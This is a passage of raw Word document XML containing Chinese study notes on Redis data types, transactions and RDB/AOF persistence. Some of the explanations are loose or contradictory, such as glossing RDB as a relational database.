    </w:p>
    <w:p w:rsidR="00353141" w:rsidRPr="00F41A4C" w:rsidRDefault="00353141" w:rsidP="00CA0A46">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　（社交网站的新鲜事、存储评论列表）。两头块，中间慢</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353141" w:rsidRPr="00F41A4C" w:rsidRDefault="00353141" w:rsidP="00CA0A46">
      <w:pPr>
        <w:ind w:left="1155" w:hangingChars="550" w:hanging="1155"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>散列</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(hash)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：散列的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>键值是一种字典结构</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，存储了字段和字段值的映射，字段值只能是字符串不支持其他类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353141" w:rsidRPr="00F41A4C" w:rsidRDefault="00353141" w:rsidP="00CA0A46">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">            (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>散列类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>适合存储对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353141" w:rsidRPr="00F41A4C" w:rsidRDefault="00353141" w:rsidP="00CA0A46">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>集合类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>使用值为空的散列表</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(hash table), </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>所有向集合增加、删除等操作时间复杂度</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353141" w:rsidRPr="00F41A4C" w:rsidRDefault="00353141" w:rsidP="00CA0A46">
      <w:pPr>
        <w:ind w:firstLineChars="450" w:firstLine="945"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>集合键之间可以进行并、交、差</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353141" w:rsidRPr="00F41A4C" w:rsidRDefault="00323ECF" w:rsidP="00CA0A46">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidR="00353141" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00353141" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>微博当中的用户关系</w:t>
      </w:r>
      <w:r w:rsidR="00353141" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA0A46" w:rsidRDefault="00353141" w:rsidP="00CA0A46">
      <w:pPr>
        <w:ind w:left="1995" w:hangingChars="950" w:hanging="1995"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>有序集合</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(sorted set)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：集合中的每个元素都关联了一个分数，能够获取分数最高或者最低的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>个元素。散列表和跳跃表</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(Skip List)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>实现的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694484" w:rsidRDefault="00694484" w:rsidP="00694484">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694484" w:rsidRDefault="00694484" w:rsidP="00694484">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事务可以一次执行多个命令，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且带有以下两个重要的保证：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694484" w:rsidRDefault="00694484" w:rsidP="00694484">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事务是一个单独的隔离操作：事务中的所有命令都会序列化、按顺序地执行。事务在执行的过程中，不会被其他客户端发送来的命令请求所打断。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694484" w:rsidRDefault="00694484" w:rsidP="00694484">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事务是一个原子操作：事务中的命令要么全部被执行，要么全部都不执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694484" w:rsidRDefault="00694484" w:rsidP="00694484">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个事务从开始到执行会经历以下三个阶段：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694484" w:rsidRDefault="00694484" w:rsidP="00694484">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始事务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694484" w:rsidRDefault="00694484" w:rsidP="00694484">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令入队。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694484" w:rsidRDefault="00694484" w:rsidP="00694484">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行事务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB01FE" w:rsidRDefault="00BD01EC" w:rsidP="00694484">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BB01FE" w:rsidRPr="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它先以</w:t>
      </w:r>
      <w:r w:rsidR="00BB01FE" w:rsidRPr="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MULTI </w:t>
      </w:r>
      <w:r w:rsidR="00BB01FE" w:rsidRPr="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始一个事务，</w:t>
      </w:r>
      <w:r w:rsidR="00BB01FE" w:rsidRPr="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB01FE" w:rsidRPr="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后将多个命令入队到事务中，</w:t>
      </w:r>
      <w:r w:rsidR="00BB01FE" w:rsidRPr="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB01FE" w:rsidRPr="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后由</w:t>
      </w:r>
      <w:r w:rsidR="00BB01FE" w:rsidRPr="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> EXEC </w:t>
      </w:r>
      <w:r w:rsidR="00BB01FE" w:rsidRPr="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令触发事务，</w:t>
      </w:r>
      <w:r w:rsidR="00BB01FE" w:rsidRPr="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB01FE" w:rsidRPr="00BB01FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一并执行事务中的所有命令</w:t>
      </w:r>
      <w:r w:rsidR="002639BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002639BF" w:rsidRPr="002639BF" w:rsidRDefault="002639BF" w:rsidP="00237AB2">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right" w:pos="8306"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002639BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="002639BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>不支持事务回滚机制，必须有开发者将数据库复原回事务执行前的状态等。</w:t>
      </w:r>
      <w:r w:rsidR="00237AB2" w:rsidRPr="00237AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>为了保持简单，</w:t>
      </w:r>
      <w:r w:rsidR="00237AB2" w:rsidRPr="00237AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>redis</w:t>
      </w:r>
      <w:r w:rsidR="00237AB2" w:rsidRPr="00237AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>事务保证了其中的一致性和隔离性；</w:t>
      </w:r>
      <w:r w:rsidR="00237AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00237AB2" w:rsidRPr="00237AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>不满足原子性和持久性；</w:t>
      </w:r>
      <w:r w:rsidR="00237AB2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA0A46" w:rsidRDefault="00CA0A46" w:rsidP="00F223B0">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>持久化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008805DF" w:rsidRDefault="00CA0A46" w:rsidP="00CA0A46">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA0A46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA0A46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>将数据从内存以某种形式同步到硬盘中，使得重启后可以根据硬盘中的记录恢复数据，这一过程就是持久化</w:t>
      </w:r>
      <w:r w:rsidR="00E16DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00E16DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidR="00E16DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>支持两种持久化方式：</w:t>
      </w:r>
      <w:r w:rsidR="00E16DBB" w:rsidRPr="00E16DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RDB</w:t>
      </w:r>
      <w:r w:rsidR="00993E8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00993E8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>关系数据库</w:t>
      </w:r>
      <w:r w:rsidR="00993E8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E16DBB" w:rsidRPr="00E16DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00E16DBB" w:rsidRPr="00E16DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AOF</w:t>
      </w:r>
      <w:r w:rsidR="00E16DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(Appendonly</w:t>
      </w:r>
      <w:r w:rsidR="0005232A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidR="00E16DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E16DBB" w:rsidRPr="00E16DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r w:rsidR="00E16DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，前者会根据指定的规则定时将内存中的数据存储在硬盘上，而后者每次执行命令将命令记录下来</w:t>
      </w:r>
      <w:r w:rsidR="00993E8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F223B0" w:rsidRPr="00F223B0" w:rsidRDefault="00F223B0" w:rsidP="00CA0A46">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F223B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="00F223B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>运行同时开启</w:t>
      </w:r>
      <w:r w:rsidRPr="00F223B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AOF</w:t>
      </w:r>
      <w:r w:rsidRPr="00F223B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F223B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F223B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，既保证了数据安全又使得进行备份等操作十分容易。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993E8F" w:rsidRDefault="00993E8F" w:rsidP="00CA0A46">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>方式：当符合一定条件时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
